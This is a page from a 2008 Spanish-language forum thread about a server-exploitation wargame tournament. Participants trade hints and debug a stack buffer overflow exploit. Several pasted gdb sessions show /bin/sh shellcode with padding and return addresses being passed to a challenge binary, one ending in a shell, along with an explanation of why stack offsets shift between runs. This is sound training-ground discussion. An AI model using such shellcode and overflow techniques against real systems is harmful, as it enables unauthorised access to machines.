elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad
| | |-+  Desafíos - Wargames
| | | |-+  WarZone (Moderador: sirdarckcat)
| | | | |-+  Torneo de explotacion de servidores 		0 Usuarios y 5 Visitantes están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 Ir Abajo Respuesta Imprimir
Autor Tema: Torneo de explotacion de servidores  (Leído 72,515 veces)
blackngel

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Torneo de explotacion de servidores
« Respuesta #120 en: 12 Diciembre 2008, 18:17 pm »
Jejeje...

AVERIGUADO! Creo que ha sido de las pruebas que más
me ha reconfortado! Desde luego esta si que me encantaría
documentarla, tiene mucha miga ;)

Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?

Bueno, a ver que toca ahora xD ¿Format String?

Un abrazo!
En línea
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #121 en: 12 Diciembre 2008, 18:57 pm »
Que bien que la aigas pasado :D veo que estoy cumpliendo mi objetivo!!

Cita de: blackngel en 12 Diciembre 2008, 18:17 pm
Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?

Se lo comenta ayer a sdc, pero en realidad me fui a dormir por que tenia mucho sueño :xD, me imagino que si va a ver meritos, puntos no se, y menos lo de la cuenta @elhacker.net pero pues ya estas por buen camino :) en un rato mas y pasa el reto completo.

Cita de: blackngel en 12 Diciembre 2008, 18:17 pm
Bueno, a ver que toca ahora xD ¿Format String?

No exactamente un FS, pero el titulo dice dejavu creo que me recuerda a la pelicula de the matrix:

Código:
http://www.youtube.com/watch?v=z_KmNZNT5xw
En línea
blackngel

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Torneo de explotacion de servidores
« Respuesta #122 en: 12 Diciembre 2008, 19:28 pm »
Bien :)

Veremos que se puede hacer, aunque lo de acabarlo va estar
difícil.

Dos cuestiones:

- ¿Diferencia entre méritos y puntos?

- Comentar que es una pena no disponer de herramientas
  como "strace" y/o "ltrace". ¿Es una decisón deliberada?

Saludos!
En línea
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #123 en: 12 Diciembre 2008, 20:36 pm »
Hola que tal !!

 :¬¬

Citar
%man truss

Wikipedia
http://es.wikipedia.org/wiki/Strace
Citar
strace es una utilidad de comprobación de errores en el sistema operativo GNU/Linux que sirve para monitorizar las llamadas al sistema usadas por un determinado programa y todas las señales que éste recibe, es similar a la aplicación truss disponible en otros sistemas Unix. Esto es posible por una característica del núcleo linux llamada ptrace.
« Última modificación: 12 Diciembre 2008, 21:18 pm por Anon » En línea
blackngel

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Torneo de explotacion de servidores
« Respuesta #124 en: 12 Diciembre 2008, 21:04 pm »
Ok ok...

Cuanto se aprende... :p

Pero ahora ser buenos. Alguna pista para la 3ª prueba?
Me ocurren cosas muy raras que no habia visto nunca!

Bye!
En línea
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #125 en: 12 Diciembre 2008, 21:20 pm »
Hola que tal nuevamente :D veo que estas entretenido :xD  :rolleyes:


Cita de: blackngel en 12 Diciembre 2008, 21:04 pm
Me ocurren cosas muy raras que no habia visto nunca!

Lo mismo me dije hace unos meses :)

pues la pista es que es un dejavu!!  :¬¬ No es broma

Saludos.
En línea
blackngel

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Torneo de explotacion de servidores
« Respuesta #126 en: 12 Diciembre 2008, 21:35 pm »
Te pido un favor:

He creado un exploit ex1.c en mi directorio, y consigo una
shell "sh" si lo ejecuto desde "gdb" con "run 1029 5".

Salen 2 mensajes de SIGTRAP y debes escribir "c" 2 veces.
Luego tienes la shell pero no tengo permisos para hacer nada
mas.

Desde fuera y con los mismos parametros ($./ex1 1029 5) solo
consigo un "bus error".

No entiendo que demonios pasa, cuando vi la SHELL ya estaba
saltando de alegria :) y ahora nada!

Puedes echarle un vistazo y probarlo tu?

Muchas gracias! Un abrazo!
En línea
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #127 en: 12 Diciembre 2008, 21:54 pm »
Bueno lo he probado y pues:

Citar
%gdb ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfec58  Offset: 0x5   Return: 0xbfbfec53

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:

1ÀPh//shh/binãPTSP°;Íì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿

Program received signal SIGBUS, Bus error.
0xbfbfec54 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGBUS, Bus error.

No dudo que te haya funcionado, sin embargo este dejavu es un dejavu :P... pero la matrix cambio algo  >:D


Saludos.
En línea
blackngel

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Torneo de explotacion de servidores
« Respuesta #128 en: 12 Diciembre 2008, 22:22 pm »
Citar
C:/Users/NikiSanders/Desktop>gdb ./ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfebf8  Offset: 0x5   Return: 0xbfbfebf3

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:

����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PTSP�;̀뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿

Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x088643e0 in _rtld_thread_init () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
$ id
uid=7027(NikiSanders) gid=6001(warusers) groups=6001(warusers),5000(warzone),5001(warzone1),5002(warzone2)
$ exit

Program exited normally.
(gdb)
En línea
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #129 en: 13 Diciembre 2008, 04:37 am »
A ya me acorde por que suele suceder eso, bueno resulta que el valor del get_esp cambia dependiendo de la cantidad de procesos que exista en memoria, tal vez por eso no me salio.

Muchas veces por ejemplo hago cosas asi con modo grafico  y pues el offset del exploit es uno, y despues lo hago en modo terminal y pues otro tanto.

Voy a ver lo del exploit y te veo que pasa.

Saludos.
En línea
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nuevo conjunto de herramientas de explotación de IceApple implementado en servidores de Microsoft Exchange
Noticias 		r32 0 2,212 Último mensaje 11 Mayo 2022, 22:19 pm
por r32
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines